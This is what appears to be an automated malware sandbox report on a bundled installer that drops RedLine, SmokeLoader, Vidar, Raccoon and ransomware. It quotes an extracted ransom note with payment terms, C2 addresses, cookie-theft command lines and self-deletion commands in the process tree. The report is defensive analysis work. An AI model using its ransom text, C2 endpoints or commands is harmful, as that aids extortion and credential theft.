Resubmissions

11-07-2024 05:43

240711-gej4lstgrf 10

06-09-2021 14:13

210906-rjpvrsedbm 10

08-07-2021 11:08

210708-4gztl3mwl6 10

08-07-2021 08:02

210708-klfb4qeda6 10

07-07-2021 09:39

210707-nem57xyvf2 10

06-07-2021 17:51

210706-7pcrmjy3fa 10

06-07-2021 13:45

210706-eybelwcq86 10

Analysis

  • max time kernel
    1801s
  • max time network
    1813s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    03-07-2021 10:43

General

  • Target

    setup_x86_x64_install - копия (18).exe

  • Size

    3.2MB

  • MD5

    3ae1c212119919e5fce71247286f8e0e

  • SHA1

    97c1890ab73c539056f95eafede319df774e9d38

  • SHA256

    30c2f230e5401b4b1ea8fb425dadf4e453575884303b9fa2066e6a91859f016e

  • SHA512

    5bb28a775c10b8b68b8c448d64287ca732d0af5577ecc4348a89934358440bb4ff6958115f14ecbabb0446d234d6f621afa3419daa4aec6c03c0af9b6a3b1558

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-ggGVjyTdgD Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0311ewgfDdU7G9lD7dF6jB6enq2GwTgCnebr4rB8NXS3mK2dY6
URLs

https://we.tl/t-ggGVjyTdgD

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Signatures

  • DiscordStealer 1 IoCs

    Discord_Stealer.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 61 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 20 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 25 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 8 IoCs
  • Checks SCSI registry key(s) 3 TTPs 33 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 16 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 5 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Script User-Agent 7 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 47 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1056
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1408
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2892
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
          • Suspicious use of SetThreadContext
          • Modifies registry class
          PID:2684
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
              PID:368
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 368 -s 376
                3⤵
                • Suspicious use of NtCreateProcessExOtherParentProcess
                • Program crash
                PID:6624
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k SystemNetworkService
              2⤵
                PID:4664
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 4664 -s 480
                  3⤵
                  • Suspicious use of NtCreateProcessExOtherParentProcess
                  • Program crash
                  PID:6100
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:2676
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Checks processor information in registry
                • Modifies registry class
                PID:5588
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                PID:2388
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2484
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2460
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1912
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1244
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1188
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:912
                      • C:\Users\Admin\AppData\Roaming\irdsfig
                        C:\Users\Admin\AppData\Roaming\irdsfig
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4484
                      • C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe
                        C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe --Task
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:5080
                        • C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe
                          C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe --Task
                          3⤵
                          • Modifies extensions of user files
                          PID:5668
                      • C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe
                        C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe --Task
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:4120
                        • C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe
                          C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe --Task
                          3⤵
                            PID:5208
                        • C:\Users\Admin\AppData\Roaming\irdsfig
                          C:\Users\Admin\AppData\Roaming\irdsfig
                          2⤵
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:996
                        • C:\Users\Admin\AppData\Roaming\gtdsfig
                          C:\Users\Admin\AppData\Roaming\gtdsfig
                          2⤵
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:5912
                        • C:\Users\Admin\AppData\Roaming\uwdsfig
                          C:\Users\Admin\AppData\Roaming\uwdsfig
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:6072
                          • C:\Users\Admin\AppData\Roaming\uwdsfig
                            C:\Users\Admin\AppData\Roaming\uwdsfig
                            3⤵
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:188
                        • C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe
                          C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe --Task
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:1420
                          • C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe
                            C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe --Task
                            3⤵
                              PID:5952
                          • C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe
                            C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe --Task
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:6716
                            • C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe
                              C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe --Task
                              3⤵
                                PID:6776
                            • C:\Users\Admin\AppData\Roaming\gtdsfig
                              C:\Users\Admin\AppData\Roaming\gtdsfig
                              2⤵
                              • Loads dropped DLL
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:6708
                            • C:\Users\Admin\AppData\Roaming\irdsfig
                              C:\Users\Admin\AppData\Roaming\irdsfig
                              2⤵
                              • Loads dropped DLL
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:6340
                            • C:\Users\Admin\AppData\Roaming\uwdsfig
                              C:\Users\Admin\AppData\Roaming\uwdsfig
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:5096
                              • C:\Users\Admin\AppData\Roaming\uwdsfig
                                C:\Users\Admin\AppData\Roaming\uwdsfig
                                3⤵
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:3620
                            • C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe
                              C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe --Task
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:2712
                              • C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe
                                C:\Users\Admin\AppData\Local\f7c7e085-a5b3-49e4-94aa-41d0fe04ff42\3505.exe --Task
                                3⤵
                                  PID:6648
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                              1⤵
                                PID:340
                              • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (18).exe
                                "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (18).exe"
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:996
                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:2600
                                  • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\setup_install.exe
                                    "C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\setup_install.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of WriteProcessMemory
                                    PID:3652
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c arnatic_2.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:680
                                      • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_2.exe
                                        arnatic_2.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious behavior: MapViewOfSection
                                        PID:3952
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c arnatic_1.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:412
                                      • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_1.exe
                                        arnatic_1.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Checks processor information in registry
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2356
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_1.exe" & del C:\ProgramData\*.dll & exit
                                          6⤵
                                            PID:4232
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im arnatic_1.exe /f
                                              7⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2692
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /t 6
                                              7⤵
                                              • Delays execution with timeout.exe
                                              PID:504
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c arnatic_3.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:1196
                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_3.exe
                                          arnatic_3.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          • Suspicious use of WriteProcessMemory
                                          PID:2512
                                          • C:\Windows\SysWOW64\rUNdlL32.eXe
                                            "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                            6⤵
                                            • Loads dropped DLL
                                            • Modifies registry class
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of WriteProcessMemory
                                            PID:3156
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c arnatic_4.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2976
                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_4.exe
                                          arnatic_4.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of WriteProcessMemory
                                          PID:2480
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                            • Executes dropped EXE
                                            PID:1492
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:4920
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                              PID:4268
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              6⤵
                                                PID:6664
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c arnatic_5.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:3716
                                            • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_5.exe
                                              arnatic_5.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2348
                                              • C:\Users\Admin\AppData\Roaming\4618437.exe
                                                "C:\Users\Admin\AppData\Roaming\4618437.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2008
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 1904
                                                  7⤵
                                                  • Program crash
                                                  PID:5248
                                              • C:\Users\Admin\AppData\Roaming\5150510.exe
                                                "C:\Users\Admin\AppData\Roaming\5150510.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4148
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 2168
                                                  7⤵
                                                  • Program crash
                                                  PID:5160
                                              • C:\Users\Admin\AppData\Roaming\4313090.exe
                                                "C:\Users\Admin\AppData\Roaming\4313090.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                PID:508
                                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4824
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c arnatic_6.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:2128
                                            • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_6.exe
                                              arnatic_6.exe
                                              5⤵
                                              • Executes dropped EXE
                                              PID:3832
                                              • C:\Users\Admin\Documents\34ZyLcBvdN6UXoArH9tlxtO9.exe
                                                "C:\Users\Admin\Documents\34ZyLcBvdN6UXoArH9tlxtO9.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4676
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "34ZyLcBvdN6UXoArH9tlxtO9.exe" /f & erase "C:\Users\Admin\Documents\34ZyLcBvdN6UXoArH9tlxtO9.exe" & exit
                                                  7⤵
                                                    PID:5728
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im "34ZyLcBvdN6UXoArH9tlxtO9.exe" /f
                                                      8⤵
                                                      • Kills process with taskkill
                                                      PID:5912
                                                • C:\Users\Admin\Documents\WmsskFJtvLn7TMi16VZ4kA3f.exe
                                                  "C:\Users\Admin\Documents\WmsskFJtvLn7TMi16VZ4kA3f.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:4668
                                                  • C:\Users\Admin\Documents\app.exe
                                                    "app.exe" (null)
                                                    7⤵
                                                      PID:5560
                                                      • C:\Users\Admin\Documents\app.exe
                                                        "C:\Users\Admin\Documents\app.exe" (null)
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Modifies data under HKEY_USERS
                                                        PID:640
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 828
                                                        8⤵
                                                        • Program crash
                                                        PID:1872
                                                  • C:\Users\Admin\Documents\arfWmgfD6ihuh9MMkzQRbmDq.exe
                                                    "C:\Users\Admin\Documents\arfWmgfD6ihuh9MMkzQRbmDq.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:4680
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --hold https://ezsearch.ru
                                                      7⤵
                                                      • Loads dropped DLL
                                                      • Enumerates system info in registry
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:5036
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ff8857e4f50,0x7ff8857e4f60,0x7ff8857e4f70
                                                        8⤵
                                                          PID:4428
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1620 /prefetch:2
                                                          8⤵
                                                            PID:2552
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1688 /prefetch:8
                                                            8⤵
                                                              PID:2644
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2200 /prefetch:8
                                                              8⤵
                                                                PID:680
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2836 /prefetch:1
                                                                8⤵
                                                                  PID:4840
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:1
                                                                  8⤵
                                                                    PID:4156
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
                                                                    8⤵
                                                                      PID:5124
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
                                                                      8⤵
                                                                        PID:5136
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
                                                                        8⤵
                                                                          PID:5176
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1
                                                                          8⤵
                                                                            PID:5240
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4700 /prefetch:8
                                                                            8⤵
                                                                              PID:5592
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5724 /prefetch:8
                                                                              8⤵
                                                                                PID:3832
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3916 /prefetch:8
                                                                                8⤵
                                                                                  PID:4404
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3856 /prefetch:8
                                                                                  8⤵
                                                                                    PID:1348
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3732 /prefetch:8
                                                                                    8⤵
                                                                                      PID:5448
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3680 /prefetch:8
                                                                                      8⤵
                                                                                        PID:5908
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,3934236839969605433,3358971016333770838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5808 /prefetch:8
                                                                                        8⤵
                                                                                          PID:6000
